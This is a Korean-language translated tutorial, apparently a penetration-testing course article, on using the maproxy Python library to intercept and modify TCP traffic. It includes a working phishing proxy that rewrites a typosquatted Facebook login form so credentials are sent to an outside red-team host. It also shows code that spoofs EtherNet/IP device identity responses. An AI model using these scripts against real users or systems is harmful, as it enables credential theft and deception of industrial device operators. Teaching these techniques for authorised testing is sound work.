즉석에서 네트워크 데이터 처리

기사의 번역은 과정 시작 전날에 준비되었습니다. “오순절. 침투 테스트 실습".

추상

정기적인 침투 테스트와 Red Team 운영부터 IoT/ICS 장치 및 SCADA 해킹에 이르기까지 다양한 유형의 보안 평가에는 바이너리 네트워크 프로토콜 작업, 즉 본질적으로 클라이언트와 대상 간의 네트워크 데이터를 가로채고 수정하는 작업이 포함됩니다. Wireshark, Tcpdump 또는 Scapy와 같은 도구가 있으므로 네트워크 트래픽을 스니핑하는 것은 어려운 작업이 아니지만 네트워크 데이터를 읽고, 필터링하고, 변경하려면 일종의 인터페이스가 필요하므로 수정은 더 노동 집약적인 작업인 것 같습니다. 즉석에서 거의 실시간으로 대상 호스트로 다시 보냅니다. 또한 이러한 도구가 다중 병렬 연결과 자동으로 작동하고 스크립트를 사용하여 사용자 정의할 수 있다면 이상적입니다.

어느 날 저는 다음과 같은 도구를 발견했습니다. maproxy, 문서를 통해 신속하게 다음과 같은 사실을 알 수 있었습니다. maproxy – 나에게 딱 필요한 것. 이는 매우 간단하고 다양하며 쉽게 구성할 수 있는 TCP 프록시입니다. 나는 이 도구가 많은 병렬 연결을 처리할 수 있는지 확인하기 위해 ICS 장치(많은 패킷을 생성하는)를 포함하여 상당히 복잡한 여러 응용 프로그램에서 테스트했으며 도구가 잘 작동했습니다.

이 기사에서는 다음을 사용하여 즉시 네트워크 데이터를 처리하는 방법을 소개합니다. maproxy.

검토

수단 maproxy Python의 인기 있고 성숙한 비동기 네트워킹 프레임워크인 Tornado를 기반으로 합니다.

일반적으로 다음과 같은 여러 모드로 작동할 수 있습니다.

• TCP:TCP – 암호화되지 않은 TCP 연결;
• TCP:SSL и SSL:TCP – 단방향 암호화 사용
• SSL:SSL – 양방향 암호화.

도서관처럼 나오네요. 빠른 시작을 위해 기본 내용을 반영하는 예제 파일을 사용할 수 있습니다. 라이브러리 기능:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

사례 1 - 단순 양방향 프록시

에 기초 tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

기본적으로 ProxyServer() 연결 위치와 대상 포트라는 두 가지 인수를 사용합니다. server.listen() 하나의 인수, 즉 들어오는 연결을 수신하기 위한 포트를 사용합니다.

스크립트 실행:

# python tcp2tcp.py

테스트를 실행하기 위해 프록시 스크립트를 통해 로컬 SSH 서버에 연결하겠습니다. 2222/tcp 포트를 연결하고 표준 포트에 연결합니다. 22/tcp SSH 서버:

환영 배너는 예제 스크립트가 네트워크 트래픽을 성공적으로 프록시했음을 알려줍니다.

사례 2 - 데이터 수정

또 다른 데모 스크립트 logging_proxy.py 네트워크 데이터와 상호 작용하는 데 이상적입니다. 파일의 주석은 목표를 달성하기 위해 수정할 수 있는 클래스 메서드를 설명합니다.

가장 흥미로운 점은 다음과 같습니다.

• on_c2p_done_read – 클라이언트에서 서버로 가는 도중에 데이터를 가로채기 위해
• on_p2s_done_read - 반대.

서버가 클라이언트에 반환하는 SSH 배너를 변경해 보겠습니다.

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

스크립트를 실행합니다.

보시다시피 클라이언트의 SSH 서버 이름이 다음으로 변경되었기 때문에 클라이언트가 잘못 인도되었습니다. «DumnySSH».

사례 3 - 단순 피싱 웹페이지

이 도구를 사용하는 방법은 끝이 없습니다. 이번에는 레드팀 운영 측면에서 좀 더 실용적인 것에 초점을 맞춰 보겠습니다. 랜딩페이지를 흉내내자 m.facebook.com 예를 들어, 의도적인 오타가 있는 사용자 정의 도메인을 사용합니다. m.facebok.com. 설명을 위해 도메인이 우리에 의해 등록되었다고 가정해 보겠습니다.

우리는 피해자 프록시 및 SSL 스트림을 사용하여 Facebook 서버에 대한 암호화되지 않은 네트워크 연결을 설정할 예정입니다(31.13.81.36). 이 예제가 작동하도록 하려면 HTTP 호스트 헤더를 교체하고 올바른 호스트 이름을 삽입해야 하며, 콘텐츠에 쉽게 액세스할 수 있도록 응답 압축도 비활성화합니다. 궁극적으로 우리는 로그인 자격 증명이 Facebook 서버 대신 우리에게 전송되도록 HTML 양식을 대체할 것입니다.

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/ko/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

결과 :

보시다시피 원본 사이트를 성공적으로 교체할 수 있었습니다.

사례 4 – 이더넷/IP 포팅

저는 프로그래밍 가능 컨트롤러(PLC), I/O 모듈, 드라이브, 릴레이, 래더 프로그래밍 환경 등과 같은 산업용 장치 및 소프트웨어(ICS/SCADA)를 오랫동안 다루어 왔습니다. 산업용 물건을 좋아하는 분들을 위한 케이스입니다. 이러한 솔루션을 해킹하려면 네트워크 프로토콜을 적극적으로 활용해야 합니다. 다음 예에서는 ICS/SCADA 네트워크 트래픽을 수정하는 방법을 보여주고 싶습니다.

이를 위해서는 다음이 필요합니다.

• 네트워크 스니퍼(예: Wireshark)
• 이더넷/IP 또는 SIP 장치는 Shodan 서비스를 사용하여 찾을 수 있습니다.
• 우리의 스크립트는 다음을 기반으로 합니다. maproxy.

먼저 CIP(Common Industrial Protocol)의 일반적인 식별 응답이 어떤 것인지 살펴보겠습니다.

장치 식별은 CIP와 같은 제어 프로토콜을 포함하는 산업용 이더넷 프로토콜의 향상된 버전인 이더넷/IP 프로토콜을 사용하여 수행됩니다. 스크린샷에 표시된 강조 표시된 ID 이름을 변경하겠습니다. "이더넷용 NI-IndComm" 프록시 스크립트를 사용합니다. 스크립트를 재사용할 수 있습니다. logging_proxy.py 마찬가지로 클래스 메서드를 수정합니다. on_p2s_done_read, 클라이언트에 다른 ID 이름이 표시되기를 원하기 때문입니다.

코드 :

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

기본적으로 우리는 장치 식별을 두 번 요청했는데 두 번째 응답은 원래 응답이었고 첫 번째 응답은 즉석에서 수정되었습니다.

그리고 마지막으로

내 의견으로는 maproxy Python으로도 작성된 편리하고 간단한 도구이므로 여러분도 이 도구를 사용하면 이점을 얻을 수 있다고 믿습니다. 물론 네트워크 데이터를 처리하고 수정하기 위한 더 복잡한 도구가 있지만 더 많은 주의가 필요하며 일반적으로 특정 사용 사례(예: 무라에나, 모들리슈카 또는 악귀 세 번째와 유사한 경우 또는 카나페 마지막 사건의 경우. 어떤 식으로든 도움을 받아 maproxy 예제 스크립트가 매우 명확하므로 네트워크 데이터를 가로채기 위한 아이디어를 빠르게 구현할 수 있습니다.

Windows AD에서 인증 메커니즘 테스트

출처 : habr.com